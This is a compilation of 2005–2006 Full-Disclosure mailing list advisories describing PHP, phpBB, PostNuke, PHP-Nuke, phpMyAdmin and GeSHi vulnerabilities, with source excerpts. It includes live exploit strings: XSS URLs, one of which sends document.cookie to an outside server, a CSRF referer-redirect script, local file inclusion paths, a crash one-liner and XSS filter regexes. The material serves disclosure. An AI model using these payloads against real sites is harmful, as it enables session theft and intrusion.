PHP4/5 is vulnerability to a local denial-of-service. General problem is in
allocated data to memory.
for example attack:
cxib# php -r 'function cx(){ cx(); } cx();'
Segmentation fault (core dumped)
cxib#
Segfault.. let`s see what we have in gdb
- ---
cxib# cat /www/functionsegfault.php
cxib# gdb -q php
(gdb) r '/www/functionsegfault.php'
Starting program: /usr/local/bin/php '/www/functionsegfault.php'
Program received signal SIGSEGV, Segmentation fault.
0x080de6bd in _zval_copy_ctor (zvalue=0xbbc00260,
__zend_filename=0x811d8c0
"/usr/ports/lang/php4/work/php-4.4.2/Zend/zend_execute.c",
__zend_lineno=1568)
at /usr/ports/lang/php4/work/php-4.4.2/Zend/zend_variables.c:111
111 /usr/ports/lang/php4/work/php-4.4.2/Zend/zend_variables.c: No such
file or directory.
in /usr/ports/lang/php4/work/php-4.4.2/Zend/zend_variables.c
(gdb) bt
#0 0x080de6bd in _zval_copy_ctor (zvalue=0xbbc00260,
__zend_filename=0x811d8c0
"/usr/ports/lang/php4/work/php-4.4.2/Zend/zend_execute.c",
__zend_lineno=1568)
at /usr/ports/lang/php4/work/php-4.4.2/Zend/zend_variables.c:111
#1 0x080f042a in execute (op_array=0x81b3880)
at /usr/ports/lang/php4/work/php-4.4.2/Zend/zend_execute.c:1568
#2 0x080f019a in execute (op_array=0x81b3880)
at /usr/ports/lang/php4/work/php-4.4.2/Zend/zend_execute.c:1719
#3 0x080f019a in execute (op_array=0x81b3880)
at /usr/ports/lang/php4/work/php-4.4.2/Zend/zend_execute.c:1719
#4 0x080f019a in execute (op_array=0x81b3880)
at /usr/ports/lang/php4/work/php-4.4.2/Zend/zend_execute.c:1719
#5 0x080f019a in execute (op_array=0x81b3880)
...
- ---
or in apache error_log
[Mon Mar 20 12:12:54 2006] [notice] child pid 744 exit signal Illegal
instruction (4)
- --- 2. Greets ---
For: sp3x
and
p_e_a, pi3, eax, Infospec ;]
- --- 3. Contact ---
Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
SecurityReason.Com
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2.2 (FreeBSD)
iD8DBQFEOAT43Ke13X/fTO4RAiFnAKC+vzJm1w24b4VN9CMdhE6e6a2L4QCePbp7
lNzhZke21IHXM0TvvjntXyY=
=Y7Ft
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] phpinfo() Cross Site Scripting PHP 5.1.2 and 4.4.2
Source: http://securityreason.com/achievement_securityalert/34
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
[phpinfo() Cross Site Scripting PHP 5.1.2 and 4.4.2]
Author: Maksymilian Arciemowicz (cXIb8O3)
Date:
- -Written: 26.2.2006
- -Public: 8.4.2006
from SecurityReason.Com
CVE-2006-0996
- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed
from C, Java and Perl with a couple of unique PHP-specific features thrown
in. The goal of the language is to allow web developers to write dynamically
generated pages quickly.
A nice introduction to PHP by Stig Sæther Bakken can be found at
http://www.zend.com/zend/art/intro.php on the Zend website. Also, much of the
PHP Conference Material is freely available.
- --- 1. Cross Site Scripting ---
In phpinfo() you can see all Varibles like:
file: standard/info.c
- -630-636---
php_print_gpcse_array("_REQUEST", sizeof("_REQUEST")-1
TSRMLS_CC);
php_print_gpcse_array("_GET", sizeof("_GET")-1 TSRMLS_CC);
php_print_gpcse_array("_POST", sizeof("_POST")-1 TSRMLS_CC);
php_print_gpcse_array("_FILES", sizeof("_FILES")-1 TSRMLS_CC);
php_print_gpcse_array("_COOKIE", sizeof("_COOKIE")-1 TSRMLS_CC);
php_print_gpcse_array("_SERVER", sizeof("_SERVER")-1 TSRMLS_CC);
php_print_gpcse_array("_ENV", sizeof("_ENV")-1 TSRMLS_CC);
- -630-636---
Function php_print_gpcse_array() for any arrays check 4096b of varible.
file: standard/info.c
- -135-154---
if (Z_TYPE_PP(tmp) == IS_ARRAY) {
zval *tmp3;
MAKE_STD_ZVAL(tmp3);
if (!sapi_module.phpinfo_as_text) {
PUTS("");
}
php_start_ob_buffer(NULL, 4096, 1 TSRMLS_CC);
zend_print_zval_r(*tmp, 0);
php_ob_get_buffer(tmp3 TSRMLS_CC);
php_end_ob_buffer(0, 0 TSRMLS_CC);
elem_esc = php_info_html_esc(Z_STRVAL_P(tmp3)
TSRMLS_CC);
PUTS(elem_esc);
efree(elem_esc);
zval_ptr_dtor(&tmp3);
if (!sapi_module.phpinfo_as_text) {
PUTS("");
}
} else if (Z_TYPE_PP(tmp) != IS_STRING) {
- -135-154---
So if we create array longer like 4096, html tags don't be remove.
Exploit:
If in php script is function phpinfo() try create some varibles (array) like
phpinfo.php?cx[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]
[][][][][]=[XSS]
or
phpinfo.php?cx[]=c..~4096chars...ccc[XSS]
- --- 2. How to fix ---
CVS
http://cvs.php.net/viewcvs.cgi/php-src/NEWS
- --- 3. Greets ---
For: sp3x
and
p_e_a, pi3, eax ;]
- --- 4. Contact ---
Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
SecurityReason.Com
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2.2 (FreeBSD)
iD8DBQFEOAIl3Ke13X/fTO4RAo4LAJ0fBxJWN64vWrDYJEuhGkqc/OC42QCbBxip
f35+6LHjuBoqP5D2JV84ufs=
=iz3m
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Re: Mis-diagnosed XSS bugs hiding worse issues due to PHP feature
On Saturday 01 April 2006 10:11, Steven M. Christey wrote: We have reported this xss (in php display_errors) 28 May 2005. http://bugs.php.net/bug.php?id=33173&edit=1 Replay from php developers : "Bogus". "...Show erros is only a convenience thing to aid you while developing. Thus no user will ever see such error messages. So in the end it is not usable for phishing and alike..." Many functions in php are vulnerability of xss. It is no dangerous but can't exists. For example http://securityreason.com/achievement_securityalert/18 or gpg version: http://securityreason.com/achievement_securityalert/18/1 function include() in postnuke. > In a post-disclosure analysis [1] of a security issue announced by > rgod [2], Siegfried observed that the reported XSS actually originated > from a file inclusion vulnerability, in which the XSS was reflected > > back from an error message when the file inclusion failed: > >About the xss, it is an xss in the php error message, there are many > >php functions returning errors without filtering them, anybody noted > >that? > > Yes. > > I would greatly appreciate some corroboration from the real PHP/web > security experts out there on what I'm about to say. If true, it > would partly explain why XSS is so rampant in PHP applications. > > As I understand it, this behavior is due to an XSS problem in PHP > itself before 5.1.2 (CVE-2006-0208), as announced in January 2006: > > http://www.php.net/release_5_1_2.php > > It's not clear if PHP 4.x was affected. > > The XSS happens when display_errors and html_errors are enabled - it > won't quote the output from raw error messages. > > No doubt many so-called XSS errors these days are the result of this > particular issue in PHP. They're aren't entirely the application's > fault, although obviously they indicate the lack of strong input > validation. > > This can hide much more serious vulnerabilities, like file inclusion, > directory traversal, or SQL injection. I have mentioned this in the > past, but now we know why this seems to happen so often. > (Application-controlled error handlers can still be subject to XSS of > course, even under a fixed PHP.) > > For those who do post-disclosure analysis: there *might* be a > resultant XSS issue if the researcher claims both XSS and another type > of bug in the same affected parameter/component, or if the > researcher's report includes error messages that don't seem to be > sanitizing XSS-tainted output. > > - Steve > > [1] > http://lists.grok.org.uk/pipermail/full-disclosure/2006-March/044756.html > > [2] http://retrogod.altervista.org/claroline_174_incl_xpl.html SecurityReason.Com Europe -- pub 1024D/7FDF4CEE 2005-09-21 uid Maksymilian Arciemowicz (cXIb8O3) <[EMAIL PROTECTED]> sub 2048g/AE816DB6 2005-09-21 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Multiple vulnerabilities in PostNuke <= 0.761
Source: http://securityreason.com/achievement_securityalert/33
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
[Multiple vulnerabilities in PostNuke <= 0.761]
SecurityAlert SA033
Author: Maksymilian Arciemowicz (cXIb8O3)
Date: 19.2.2006
from SecurityReason.Com
- --- 0.Description ---
PostNuke: The Phoenix Release (0.761)
PostNuke is an open source, open developement content management system
(CMS). PostNuke started as a fork from PHPNuke (http://www.phpnuke.org) and
provides many enhancements and improvements over the PHP-Nuke system. PostNuke
is still undergoing development but a large number of core functions are now
stabilising and a complete API for third-party developers is now in place.
If you would like to help develop this software, please visit our homepage
at http://noc.postnuke.com/
You can also visit us on our IRC Server irc.postnuke.com channel
#postnuke-support
#postnuke-chat
#postnuke
Or at the Community Forums located at:
http://forums.postnuke.com/
- --- 1. Bypass pnVarCleanFromInput() and pnAntiCracker ---
In PostNuke is function pnVarCleanFromInput() (file includes/pnAPI.php).
- -419-515---
function pnVarCleanFromInput()
{
// Create an array of bad objects to clean out of input variables
$search = array('||si',
'||si',
'||si',
'||si',
'||si',
'||si',
'||si',
'|STYLE\s*=\s*"[^"]*"|si');
// Create an empty array that will be used to replace any malacious code
$replace = array('');
...
- -419-515---
and function pnSecureInput() (file includes/pnAntiCracker.php).
- -31-109---
function pnSecureInput()
{
// Cross-Site Scripting attack defense - Sent by larsneo
// some syntax checking against injected javascript
// extended by Neo
if (count($_GET) > 0) {
//Lets now sanitize the GET vars
foreach ($_GET as $secvalue) {
if (!is_array($secvalue)) {
if ((eregi("<[^>]*script.*\"?[^>]*>", $secvalue)) ||
(eregi(".*[[:space:]](or|and)[[:space:]].*(=|like).*",
$secvalue)) ||
(eregi("<[^>]*object.*\"?[^>]*>", $secvalue)) ||
(eregi("<[^>]*iframe.*\"?[^>]*>", $secvalue)) ||
(eregi("<[^>]*applet.*\"?[^>]*>", $secvalue)) ||
(eregi("<[^>]*meta.*\"?[^>]*>", $secvalue)) ||
(eregi("<[^>]*style.*\"?[^>]*>", $secvalue)) ||
(eregi("<[^>]*form.*\"?[^>]*>", $secvalue)) ||
(eregi("<[^>]*window.*\"?[^>]*>", $secvalue)) ||
(eregi("<[^>]*alert.*\"?[^>]*>", $secvalue)) ||
(eregi("<[^>]*img.*\"?[^>]*>", $secvalue)) ||
(eregi("<[^>]*document.*\"?[^>]*>", $secvalue)) ||
(eregi("<[^>]*cookie.*\"?[^>]*>", $secvalue)) ||
(eregi("\"", $secvalue))) {
pnMailHackAttempt('pnAntiCracker',__LINE__,'pnSecurity
Alert','GET Intrusion detection.');
Header("Location: index.php");
}
}
}
}
//Lets now sanitize the POST vars
if ( count($_POST) > 0) {
foreach ($_POST as $secvalue) {
if (!is_array($secvalue)) {
if ((eregi("<[^>]*script.*\"?[^>]*>", $secvalue)) ||
(eregi("<[^>]*object.*\"?[^>]*>", $secvalue)) ||
(eregi("<[^>]*iframe.*\"?[^>]*>", $secvalue)) ||
(eregi("<[^>]*applet.*\"?[^>]*>", $secvalue)) ||
(eregi("<[^>]*window.*\"?[^>]*>", $secvalue)) ||
(eregi("<[^>]*alert.*\"?[^>]*>", $secvalue)) ||
(eregi("<[^>]*document.*\"?[^>]*>", $secvalue)) ||
(eregi("<[^>]*cookie.*\"?[^>]*>", $secvalue)) ||
(eregi("<[^>]*meta.*\"?[^>]*>", $secvalue))
) {
pnMailHackAttempt('pnAntiCracker',__LINE__,'pnSecurity
Alert','POST Intrusion detection.');
RE: [Full-disclosure] phpBB 2.0.19 Cross Site Request Forgeries and XSSAdmin
> From: Berliner
> 1. Basically all phpBB admin-side options do allow full HTML, including
> javascript. That is the intended behaviour, as there are legitimate uses.
>
> phpBB does however check the Session ID before allowing the changes to go to
> the database.
> Your exploit needs a valid admin session key and you need to get the admin
> to visit the page (unless you happen to have a lot of luck with your IP)- be
> it by a link or a reflecting page. And even then, it will only work, when
> the admin has logged into the ACP prior to running into the trap.
>
$sid='';
preg_match('#sid\=?([0-9a-z]*)#i', getenv('HTTP_REFERER'), $sid);
if($sid[1]!=''){
header("Location: ".$operation."&sid=".$sid[1]);
if you have example http://SOME.SCRIPT.PHP";> and you send reffere...
(testes in IE, Mozilla etc) that please check.. getenv('HTTP_REFERER')
The phpBB team was informed about this issues and they confirmed that these
vulnerabilitie exists in phpBB 2.0.19. Solusion is use POST for all
operation.
> 2. That is a general problem with all pages allowing of-site pictures. It
> has been discussed on the list before. Most of your examples won't work with
> phpBB, due to the missing Session ID in the links.
--
pub 1024D/7FDF4CEE 2005-09-21
uid Maksymilian Arciemowicz (cXIb8O3) <[EMAIL PROTECTED]>
sub 2048g/AE816DB6 2005-09-21
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] phpBB 2.0.19 Cross Site Request Forgeries and XSS Admin
Orginal Source: http://securityreason.com/achievement_securityalert/31
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
[phpBB 2.0.19 Cross Site Request Forgeries and XSS Admin]
Author: Maksymilian Arciemowicz (cXIb8O3)
Date: 3.2.2006
from SecurityReason.Com
CVE-2006-0437 for the XSS issues
CVE-2006-0438 for the CSRF issues
- --- 0.Description ---
phpBB is a high powered, fully scalable, and highly customizable Open Source
bulletin board package. phpBB has a
user-friendly interface, simple and straightforward administration panel, and
helpful FAQ. Based on the powerful PHP
server language and your choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC
database servers, phpBB is the ideal
free community solution for all web sites.
Contact with author http://www.phpbb.com/about.php.
- --- 1. XSS admin ---
In admin/admin_smilies.php you can create, modifcate smille. So nothing
special but phpBB don't check what is going to db.
case savenew
- -448-473---
$smile_code = ( isset($HTTP_POST_VARS['smile_code']) ) ?
$HTTP_POST_VARS['smile_code'] :
$HTTP_GET_VARS['smile_code'];
$smile_url = ( isset($HTTP_POST_VARS['smile_url']) ) ?
$HTTP_POST_VARS['smile_url'] :
$HTTP_GET_VARS['smile_url'];
$smile_url = phpbb_ltrim(basename($smile_url), "'");
$smile_emotion = ( isset($HTTP_POST_VARS['smile_emotion']) ) ?
$HTTP_POST_VARS['smile_emotion'] : $HTTP_GET_VARS['smile_emotion'];
$smile_code = trim($smile_code);
$smile_url = trim($smile_url);
$smile_emotion = trim($smile_emotion);
// If no code was entered complain ...
if ($smile_code == '' || $smile_url == '')
{
message_die(GENERAL_MESSAGE, $lang['Fields_empty']);
}
//
// Convert < and > to proper htmlentities for parsing.
//
$smile_code = str_replace('<', '<', $smile_code);
$smile_code = str_replace('>', '>', $smile_code);
//
// Save the data to the smiley table.
//
$sql = "INSERT INTO " . SMILIES_TABLE . " (code, smile_url, emoticon)
VALUES ('" . str_replace("\'", "''", $smile_code) . "', '" .
str_replace("\'", "''",
$smile_url) . "', '" . str_replace("\'", "''", $smile_emotion) . "')";
$result = $db->sql_query($sql);
- -448-473---
Only "<" and ">" are restricted.
http://[HOST]/[DIR]/admin/admin_smilies.php?mode=savenew&smile_code=:x:&smile_url=icon_mrgreen.gif&smile_emotion=c";
onmouseover="alert('SecurityReason.Com')" &sid=SIDofADMIN
'alert("SecurityReason.Com")'%20&sid=SIDofADMIN
http://[HOST]/[DIR]/admin/admin_smilies.php?mode=savenew&smile_code=:q:&smile_url=icon_mrgreen.gif"%20onmouseover="alert(document.location='http://[SRVER]/cookies?'+document.cookie)"%20&sid=SIDofADMIN
and you have new smile. Ofcourse you can better do exploit. For IE and etc.
- --- 2. Cross Site Request Forgeries ---
phpBB admin in Administration Panel have SID in url. Ok. Example if you want
see user profil or split, lock someone
post etc.
Like:
http://[HOST]/[DIR]/admin/admin_users.php?sid=88eafcce6dddcee3fccc08de7ec505d0
http://[HOST]/[DIR]/modcp.php?t=2&mode=split&sid=c1db64124b7ced0668dec5900fed3b35
etc.
If this user have "Link to off-site Avatar" ON or is bbcode (IMG) ON then you
can create url to script with referer for admin.So when admin open profil the
url will be executed. Need be referer in request.
Next problem is:
103# if ( !preg_match("#^((ht|f)tp://)([^ \?&=\#\"\n\r\t<]*?(\.(jpg|jpeg|gif|
png))$)#is", $avatar_filename) )
in includes/unsercp_avatar.php.
Why? Because this preg() don't have limit of chars.
In mysql phpbb DB you have (*_users)
user_avatar varchar(100)
only 100 chars will go to db.
So you can post url like
http://[HOST]/[DIR]/script.php/[100 chars].jpg
Sent:
http://[HOST]/[DIR]/script.php/securityreasonsecurityreasonsecurityreasonsecurityreasonsecurityreasonsecur.jpg
and in db is:
http://[HOST]/[DIR]/script.php/securityreasonsecurityreasonsecurityreasonsecurityreasonsecurityreasonsecur
or in bbcode (IMG)
http://[HOST]/[DIR]/script.php/securityreason.jpg
Nothing special.. Ok..
You need create new user (nick name can be "FUCKmeADMIN" etc). And upload one
script. Doesn't need be in serverwhere is phpbb.
- -script.php--
http://[HOST]/[DIR]/admin/admin_smilies.php?mode=savenew&smile_code=try&smile_url=icon_mrgreen.gif"%20onmouseover=\'alert("SecurityReason.Com)\'%20';
#
http://[host]/admin/admin_smilies.php?mode=savenew&smile_code=a&smile_url=ico
[Full-disclosure] phpBB 2.0.18 XSS and Full Path Disclosure
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
[phpBB 2.0.18 XSS and Full Path Disclosure cXIb8O3.22]
Author: Maksymilian Arciemowicz (cXIb8O3)
Date: 16.12.2005
from securityreason.com TEAM
- --- 0.Description ---
phpBB is a high powered, fully scalable, and highly customizable Open Source
bulletin board package. phpBB has a user-friendly interface, simple and
straightforward administration panel, and helpful FAQ. Based on the powerful
PHP server language and your choice of MySQL, MS-SQL, PostgreSQL or
Access/ODBC database servers, phpBB is the ideal free community solution for
all web sites.
Contact with author http://www.phpbb.com/about.php.
- --- 1. XSS ---
If in phpbb is Allowed HTML tags "ON" like b,i,u,pre and have you in profile
"Always allow HTML: YES" or are you Guest
that you can use this tags:
H E L O
Exploit:
http://HOST/cookies?'+document.cookie)"
X=" H A L O
and have you cookies.
- --- 2. Full Path Disclosure ---
In file admin/admin_disallow.php is
- -25-31---
if( !empty($setmodules) )
{
$filename = basename(__FILE__);
$module['Users']['Disallow'] = append_sid($filename);
return;
}
- -25-31---
function append_sid() dosen't exists. And if you have:
register_globals = On
display_errors = On
Try to go:
http://[HOST]/[DIR]/admin/admin_disallow.php?setmodules=1
- -RESULT ERROR---
Fatal error: Call to undefined function: append_sid()
in /www/2018/phpBB2/admin/admin_disallow.php on line 28
- -RESULT ERROR---
- --- 3. Greets ---
sp3x
- --- 4.Contact ---
Author: Maksymilian Arciemowicz < cXIb8O3 >
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
securityreason.com TEAM
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2 (FreeBSD)
iD8DBQFDpDtC3Ke13X/fTO4RAosCAJkBcYRNbHKDGeuwnY1U/WXMhzDnVQCgl39D
/0u14EN2sQAh1Bwu0yvT48Q=
=lsL8
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Bypass XSS filter in PHPNUKE 7.9=>x
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
[Bypass XSS filter in PHPNUKE 7.9=>x cXIb8O3.21]
Author: Maksymilian Arciemowicz ( cXIb8O3 )
Date: 14.12.2005
from SECURITYREASON.COM
- --- 0.Description ---
PHP-Nuke is a Web Portal System, storytelling software, news system, online
community or whatever you want to call it. Its goal is to have an automated
web site to distribute news and articles with user system. Each user can
submit comments to discuss the articles, similar to Slashdot and many others.
Features: web admin, polls/surveys with comment, statistics, user
customizable box, themes manager, friendly admin GUI, moderation system,
sections manager, banner system, backend/headlines generation, Yahoo like
search engine, Ephemerids manager, file manager, download manager, faq
manager, advanced blocks system, reviews system, newsletter, content
management, encyclopedia generator, md5 password encryption, phpBB Forums
integration, support for 25 languages, 100% modular and more. Written 100% in
PHP and requires Apache, PHP and a SQL Database Server. Supports MySQL,
PostgreSQL, Adabas, mSQL and many others.
- --- 1. Bypass XSS filter ---
In PHPnuke is (file includes/mainfile.php).
- -168-193---
if (!defined('ADMIN_FILE') && !file_exists('includes/nukesentinel.php')) {
foreach ($_GET as $sec_key => $secvalue) {
if ((eregi("<[^>]*script*\"?[^>]*>", $secvalue)) ||
(eregi("<[^>]*object*\"?[^>]*>", $secvalue)) ||
(eregi("<[^>]*iframe*\"?[^>]*>", $secvalue)) ||
(eregi("<[^>]*applet*\"?[^>]*>", $secvalue)) ||
(eregi("<[^>]*meta*\"?[^>]*>", $secvalue)) ||
(eregi("<[^>]*style*\"?[^>]*>", $secvalue)) ||
(eregi("<[^>]*form*\"?[^>]*>", $secvalue)) ||
(eregi("<[^>]*img*\"?[^>]*>", $secvalue)) ||
(eregi("<[^>]*onmouseover*\"?[^>]*>", $secvalue)) ||
(eregi("<[^>]*body*\"?[^>]*>", $secvalue)) ||
(eregi("\([^>]*\"?[^)]*\)", $secvalue)) ||
(eregi("\"", $secvalue)) ||
(eregi("forum_admin", $sec_key)) ||
(eregi("inside_mod", $sec_key))) {
die ($htmltags);
}
}
foreach ($_POST as $secvalue) {
if ((eregi("<[^>]*onmouseover*\"?[^>]*>", $secvalue)) ||
(eregi("<[^>]script*\"?[^>]*>", $secvalue)) || (eregi("<[^>]*body*\"?[^>]*>",
$secvalue)) || (eregi("<[^>]style*\"?[^>]*>", $secvalue))) {
die ($htmltags);
}
}
}
- -168-193---
This functions deletes from input html tags like:
-
[Full-disclosure] phpBB 2.0.18 SQL Query problem
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [phpBB 2.0.18 SQL Query problem cXIb8O3.19] Author: Maksymilian Arciemowicz (cXIb8O3) Date: 11.11.2005 from securityreason.com TEAM - --- 0.Description --- phpBB is a high powered, fully scalable, and highly customizable Open Source bulletin boar d package. phpBB has a user-friendly interface, simple and straightforward administration panel, and helpful FAQ. Based on the powerful PHP server language and your choice of MySQL , MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the ideal free community so lution for all web sites. Contact with author http://www.phpbb.com/about.php. - --- 1. * SQL query problem --- phpBB2 don't check size of sql query. So we can send any data in all post variables. Standart Environment: post_max_size=8M (standart) max_allowed_packet < 7M (1M standart in mysql) Example Evironment: memory_limit>8MB max_execution_time=30 max_allowed_packet=1M I have written simple request where one variable POST to sql query was 1M. - ---request--- POST /2018/phpBB2/search.php HTTP/1.1 Host: localhost Content-Type: application/x-www-form-urlencoded Content-Length: strlen(x) mode=results&search_keywords=SecurityReasonComSecurityRea...xMB>max_allowed_packet. (example.1MB.data)...sonCom - ---/request--- so in output: - ---output1--- Could not obtain matched posts list DEBUG MODE SQL Error : 1153 Got a packet bigger than 'max_allowed_packet' SELECT m.post_id FROM phpbb_search_wordlist w, phpbb_search_wordmatch m WHERE w.word_text LIKE 'securityreasoncomsecurityreasoncom...' AND m.word_id = w.word_id AND w.word_common <> 1 AND m.title_match = 0 Line : 321 File : search.php - ---/output1--- sql error. or when you have: memory_limit=8MB or max_execution_time<30 display_error=1 You can see in output example: - ---output2--- Fatal error: Maximum execution time of 15 seconds exceeded in /www/2018/phpBB2/includes/functions_search.php on line 72 - ---/output2--- - ---output3--- Fatal error: Allowed memory size of 8388608 bytes exhausted (tried to allocate 1746401 bytes) in /www/2018/phpBB2/includes/functions_search.php on line 27 - ---/output3--- Exploit: http://securityreason.com/achievement_exploitalert/4 (simple errors) - --- 2. Greets --- sp3x - --- 3.Contact --- Author: Maksymilian Arciemowicz < cXIb8O3 > Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg securityreason.com TEAM -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2 (FreeBSD) iD8DBQFDTTO43Ke13X/fTO4RAuUsAJ9Ry6GqbPsb1wSxvqU37cp87UHpTgCeIwdy k1NCDNaYsDg1ofLsZFJDMAw= =dp0t -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Re: Advisory 16/2005: phpMyAdmin Local File Inclusion Vulnerability (Stefan Esser)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 It is low local file inclusion. No critical. Standart have you $cfg['ThemePath']. More critical bug still exists in phpmyadmin. phpMyAdmin-2.6.4-pl3/libraries/database_interface.lib.php?cfg[Server] [extension]=../../mGPC_muss_be_off_%00 org. adv. http://securityreason.com/achievement_securityalert/1 Maksymilian Arciemowicz [EMAIL PROTECTED] SecurityReason.Com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2 (FreeBSD) iD8DBQFDW8673Ke13X/fTO4RAsbzAKCv8tkGfD5dAbliWlaLMkfLkYnVfgCgs9RE HllDGmvD6iOQiSeH9Sk4WCQ= =9U2v -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] phpMyAdmin Local file inclusion 2.6.4-pl1
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
[phpMyAdmin Local file inclusion 2.6.4-pl1]
Author: Maksymilian Arciemowicz ( cXIb8O3 ).18
Date: 10.10.2005
from SECURITYREASON.COM
- --- 0.Description ---
phpMyAdmin 2.6.4 is a tool written in PHP intended to
handle the administration of MySQL over the Web.
Currently it can create and drop databases,
create/drop/alter tables, delete/edit/add fields,
execute any SQL statement, manage keys on fields.
blablabla...
phpMyAdmin is very dangerous script.
- --- 1. Local file inclusion (Critical) ---
File: ./libraries/grab_globals.lib.php
This file is included by many files. Example file index.php
- -index.php--
/* $Id: index.php,v 2.14 2004/10/19 17:23:09 nijel Exp $ */
// vim: expandtab sw=4 ts=4 sts=4:
/**
* Gets core libraries and defines some variables
*/
require_once('./libraries/grab_globals.lib.php');
require_once('./libraries/common.lib.php');
...
- -index.php--
ok so. In ./libraries/grab_globals.lib.php we have:
- -101-104-grab_globals.lib.php-
if ( ! empty( $__redirect ) ) {
require('./' . $__redirect);
exit();
} // end if ( ! empty( $__redirect ) )
- -101-104-grab_globals.lib.php-
But before we have
- -53-67-grab_globals.lib.php---
// check if a subform is submitted
$__redirect = NULL;
if ( isset( $_POST['usesubform'] ) ) {
// if a subform is present and should be used
// the rest of the form is deprecated
$subform_id = key( $_POST['usesubform'] );
$subform= $_POST['subform'][$subform_id];
$_POST = $subform;
if ( isset( $_POST['redirect'] )
&& $_POST['redirect'] != basename( $_SERVER['PHP_SELF'] ) ) {
$__redirect = $_POST['redirect'];
unset( $_POST['redirect'] );
} // end if ( isset( $_POST['redirect'] ) )
} // end if ( isset( $_POST['usesubform'] ) )
// end check if a subform is submitted
- -53-67-grab_globals.lib.php---
If varible $_POST['usesubform'] exists and is array, that we can created new varibles for $_POST (example $_POST['redirect']).
$subform= $_POST['subform'][$subform_id];
$_POST = $subform;
where array $_POST = array $_POST[subform][1]
that
$_POST['redirect']=$_POST[subform][1][redirect]
and we have local file inclusion.
Example response in html:
- -Exploit---
File
- -Exploit---
Exploit:
http://securityreason.com/achievement_exploitalert/2
- --- 2. Greets ---
sp3x
- --- 3.Contact ---
Author: Maksymilian Arciemowicz < cXIb8O3 >
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG-KEY: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
WWW: http://securityreason.com
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2 (FreeBSD)
iD8DBQFDSnd/3Ke13X/fTO4RAse3AKCAT3s7bzwySDsGHqYN0+Vm+D+OiwCdFf/T
cvqCRiRlK9XrQGvV3sYxzXQ=
=yoDY
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] GeSHi Local PHP file inclusion 1.0.7.2
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
[GeSHi Local PHP file inclusion 1.0.7.2]
Author: Maksymilian Arciemowicz ( cXIb8O3 ).17
Date: 21.9.2005
from SECURITYREASON.COM
- --- 0.Description ---
GeSHi started as a mod for the phpBB forum system, to enable highlighting of
more languages than the available (which was 0 ;)). However, it quickly
spawned into an entire project on its own. But now it has been released, work
continues on a mod for phpBB - and hopefully for many forum systems, blogs
and other web-based systems.
Several systems are using GeSHi now, including:
PostNuke - A popular open source CMS
Docuwiki - An advanced wiki engine
gtk.php.net - Their manual uses GeSHi for syntax highlighting
WordPress - A powerful blogging system
PHP-Fusion - A constantly evovling CMS
SQL Manager - A Postgres DBAL
Mambo - A popular open source CMS
MediaWiki - A leader in Wikis
TikiWiki - A megapowerful Wiki/CMS, and one I personally use
RWeb - A site-building tool
- --- 1. Local (PHP) file inclusion ---
I have found one bug in file ./contrib/example.php
This file exists in standart packet GeSHi.
In file:
- -10-18-line---
include('../geshi.php');
if ( isset($_POST['submit']) )
{
if ( get_magic_quotes_gpc() ) $_POST['source'] =
stripslashes($_POST['source']);
if ( !strlen(trim($_POST['source'])) )
{
$_POST['source'] = implode('', @file('../geshi/' .
$_POST['language'] .
'.php'));
$_POST['language'] = 'php';
}
- -10-18-line---
Ok.. so, if exists variable $_POST['submit'] and $_POST['language'], you can
read any php file
(for example in postnuke -config.php-).
You need use varible $_POST['language'] wher is path to php file.
